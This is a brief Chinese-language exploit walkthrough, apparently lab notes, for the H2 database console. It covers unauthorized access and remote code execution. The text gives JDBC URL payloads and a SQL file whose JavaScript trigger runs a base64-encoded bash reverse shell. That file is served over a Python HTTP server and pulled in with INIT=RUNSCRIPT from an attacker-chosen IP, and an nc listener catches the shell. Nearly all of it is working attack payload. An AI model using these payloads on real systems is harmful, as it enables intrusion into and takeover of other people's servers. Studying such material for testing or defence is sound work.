启动环境:
访问界面
未授权进入POC:
jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;\
RCE执行反弹
-创建数据库文件:h2database.sql
CREATE TABLE test ( id INT NOT NULL ); CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript Java.type("java.lang.Runtime").getRuntime().exec("bash -c {echo,base64加密的反弹shell指令}|{base64,-d}|{bash,-i}");';
启动python服务
python3 -m http.server 端口
填入payload
jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT FROM 'http://搭建的IP:端口/h2database.sql';\
nc -lvvp xxxx